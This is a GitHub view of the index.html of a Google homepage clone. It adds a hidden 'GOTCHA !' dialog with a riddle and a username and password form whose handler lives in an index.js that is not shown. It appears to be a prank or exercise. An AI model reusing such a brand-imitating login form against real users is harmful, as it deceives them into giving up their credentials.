forked from bassem97/GoogleInterface
-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
78 lines (69 loc) · 2.87 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="https://code.iconify.design/iconify-icon/1.0.0/iconify-icon.min.js"></script>
<title>Google</title>
<link rel="icon" href="favicon.ico">
<link rel="stylesheet" href="clone.css">
<link rel="stylesheet" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<script type="text/javascript" src="index.js"></script>
</head>
<body>
<header>
<div class="head">
<p class="">Gmail</p>
<iconify-icon icon="akar-icons:dot-grid"></iconify-icon>
<button class="sign">Sign in</button>
</div>
</header>
<section class="section-1">
<img src="images/google.png" class="logo">
<form><br><br>
<div class="s-box" id="opener">
<img src="images/search.svg" class="search-icon">
<input type="text" class="s-input" >
<img src="images/google-mic.svg" class="vs-icon">
<img src="images/camera.svg" class="cm-icon">
<input type="submit" class="s-btn" value="Google Search">
<input type="submit" class="s-btn" value="I'm Feeling Lucky">
</div>
</form>
<div class="lang" id="box">
Google offered in:
<a href="#" class="a">Arabic</a>
</div>
</section>
<footer>
<h4>Tunisia</h4>
<div class="links">
<div class="link-1">
<a href="#">In regards to</a>
<a href="#">Advertising</a>
<a href="#">Business</a>
<a href="#">How does Google search work?</a>
</div>
<div class="link-2">
<a href="#">Privacy</a>
<a href="#">Terms</a>
<a href="#">Settings</a>
</div>
</div>
</footer>
<div id="dialog" title="GOTCHA !" style="display : none ">
<p class="validateTips">What is always in front of you, can't be seen 😁</p>
<form onsubmit="submit_form()">
<fieldset>
<label for="username">Username</label>
<input type="text" name="username" id="username" placeholder="username" class="text ui-widget-content ui-corner-all">
<label for="password">Password</label>
<input type="password" name="password" id="password" placeholder="password" class="text ui-widget-content ui-corner-all">
</fieldset>
</form>
</div>
</body>
</html>